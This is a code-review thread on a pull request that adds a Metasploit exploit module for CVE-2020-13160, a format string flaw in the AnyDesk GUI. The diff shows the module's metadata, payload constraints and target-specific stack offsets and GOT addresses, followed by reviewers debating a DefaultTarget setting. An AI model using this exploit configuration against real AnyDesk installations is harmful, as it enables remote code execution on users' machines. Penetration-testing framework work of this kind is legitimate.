modules/exploits/linux/misc/cve_2020_13160_anydesk.rb

```diff
@@ -0,0 +1,154 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::Udp
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'AnyDesk GUI Format String Write',
+        'Description' => %q{
+          The AnyDesk GUI is vulnerable to a remotely exploitable format string vulnerability. By sending a specially
+          crafted discovery packet, an attacker can corrupt the front end process when it loads or refreshes. While the
+          discovery service is always running, the GUI frontend must be started to trigger the vulnerability. On
+          successful exploitation, code is executed within the context of the user who started the AnyDesk GUI.
+        },
+        'Author' => [
+          'scryh', # vulnerability discovery and original exploit
+          'Spencer McIntyre' # metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'CVE', '2020-13160' ],
+            [ 'URL', 'https://devel0pment.de/?p=1881' ],
+
+          ],
+        'Payload' => {
+          'Space' => 512,
+          'BadChars' => "\x00\x25\x26"
+        },
+        'Platform' => 'linux',
+        'Arch' => ARCH_X64,
+        'DefaultOptions' => {
+          'CPORT' => 50001,
+          'PrependFork' => true,
+          'WfsDelay' => 10
+        },
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ SCREEN_EFFECTS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        },
+        'Targets' =>
+          [
+            [
+              'Anydesk 5.5.2 Ubuntu 20.04 x64',
+              { 'stkref1' => 109, 'stkref2' => 125, 'time@got.plt' => 0x119ddc0 - 139 }
+            ],
+            [
+              'Anydesk 5.5.2 Ubuntu 18.04 x64',
+              { 'stkref1' => 93, 'stkref2' => 165, 'time@got.plt' => 0x119ddc0 - 135 }
+            ]
+          ],
```

Comment:
```suggestion
          ],
          'DefaultTarget' => 0,
```

Reply:
Is it necessary to explicitly specify this? It's showing up as already defaulting to target 0 / "Anydesk 5.5.2 Ubuntu 20.04 x64" which is what I would want as the default.

Reply:
It is not necessary for the function of the code, but it is useful for anyone reading the code. Feel free to disregard. I prefer to be explicit.

Reply:
Nevermind, disregard that. You're right it is necessary.

Reply:
Oof, that must have been Dave's changes. You got `Automatic`? Yeah... Necessary now.